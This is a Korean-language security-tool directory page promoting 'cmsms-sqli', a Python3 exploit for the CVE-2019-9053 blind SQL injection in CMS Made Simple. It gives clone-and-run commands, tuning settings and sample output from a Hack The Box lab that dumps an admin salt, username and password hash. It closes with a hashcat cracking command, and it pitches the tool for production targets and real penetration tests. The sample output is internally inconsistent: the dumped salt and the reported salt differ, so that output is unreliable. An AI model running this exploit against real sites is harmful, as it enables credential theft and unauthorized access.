Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cmsms-sqli — Python3 exploit for CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). No deps, time-based blind SQLi → admin creds dump. HTB Writeup owned. | Kitploit
도구/GitHubGitHub/tim-karov/cmsms-sqli
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration Testing
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Python3 exploit for CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). No deps, time-based blind SQLi → admin creds dump. HTB Writeup owned.

저장소 보기
57개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CMS Made Simple <= 2.2.9 SQL Injection (CVE-2019-9053) - Python3 Exploit

원본 Exploit-DB #46635 (Daniele Scanu 제작)의 순수 Python3 포트입니다. 시간 기반 블라인드 SQL 인젝션을 통해 취약한 CMS Made Simple 설치에서 관리자 자격 증명을 덤프합니다.

🎯 기능:

✅ 외부 종속성 없음 (requests만 필요)

✅ Python 3.6+ 네이티브 (f-strings, walrus 연산자)

✅ 아름다운 컬러 출력 (ANSI)

✅ 안정적이고 빠름 (평균 연결 시 약 3-5분 내 덤프)

✅ 프로덕션 대상에 대한 타임아웃/오류 처리

✅ Hashcat 준비 완료 출력 (salt + MD5 형식)

🚀 사용법:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# 예제 출력 (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 사용자 정의:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 크레딧:

원저자: Daniele Scanu

Exploit-DB: #46635

Python3 포트 및 개선: Tim Karov

📄 라이선스:

MIT 라이선스 - LICENSE 참조


⭐ 도움이 되셨다면 Star를 눌러주세요! HTB/TryHackMe 랩 및 실제 침투 테스트에 사용되었습니다.

도구 다운로드